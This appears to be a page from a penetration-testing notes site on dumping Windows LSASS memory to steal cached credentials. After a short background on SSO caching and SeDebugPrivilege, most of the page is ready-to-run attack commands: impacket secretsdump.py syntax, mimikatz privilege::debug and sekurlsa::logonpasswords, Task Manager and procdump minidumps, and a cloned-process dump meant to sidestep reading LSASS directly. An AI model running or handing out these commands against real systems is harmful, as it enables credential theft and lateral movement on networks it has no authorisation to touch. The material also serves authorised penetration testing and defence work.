LSASS Credentials

The Local Security Authority Subsystem Service (LSASS) process manages various security-related functions in Windows, such as user authentication.

LSASS (lsass.exe) is a process that implements many functions of the Local Storage Authority (LSA).

When a domain user performs an interactive logon (physically or via RDP) to a computer, the user's credentials get cached in the LSASS Process in order to use Single Sign-On (SSO) when network logon is required to access services on the domain.

Users authenticating remotely via NTLM or Kerberos authentication will not cache their credentials on the computer unless Kerberos delegation is enabled.

To access LSASS Process memory to extract credentials, you must have a user account with SeDebugPrivilege to the target Windows computer. Most of the time, this means that you have access to an account with local administrator privileges to the computer.

SeDebugPrivilege is enabled by default in PowerShell and NOT enabled by default in CMD.

There are many, many tools and research on ways an attacker can dump the LSASS process. Dumping LSASS is a much larger topic than what is mentioned here, especially once you look into protections against LSASS dumping and evading EDR.

Regardless, below are a few popular methods that may work on organizations that may not have executed any penetration tests.

GitHub - fortra/impacket: Impacket is a collection of Python classes for working with network protocols.GitHub

Linux (Attacker)

secretsdump.py <domain/>[username]<:password><@computer> <options>

OPTIONS
-outputfile                 Base Output Filename
-hashes                     Authenticate Using LMHASH:NTHASH
-k                          Use Kerberos Auth From ccache File

GitHub - gentilkiwi/mimikatz: A little tool to play with Windows securityGitHub

Windows (Target Computer)

## Run Mimikatz
mimikatz.exe

## Enable SeDebugPrivilege In Your Terminal
privilege::debug

## Dump LSASS Memory
sekurlsa::logonpasswords

You can create a minidump of the lsass.exe process using the Task Manager running as administrator. Simply locate lsass.exe, right-click on it, and select Create Dump File. We can then use Mimikatz to read the dump.

Linux/Windows

## Switch Mimikatz context to the lsass.exe dump
sekurlsa::minidump [path to lsass dump]

## Dump Contents Of LSASS Dump
sekurlsa::logonpasswords

ProcDump - SysinternalsMicrosoftLearn

Windows (Target Computer)

## Dump LSASS Process
procdump.exe -accepteula -ma lsass.exe lsass.dmp

## Avoid Reading LSASS By Dumping Cloned LSASS Process
procdump.exe -accepteula -r -ma lsass.exe lsass.dm

PreviousCredential Hunting NextRegistry Credentials

Last updated 1 year ago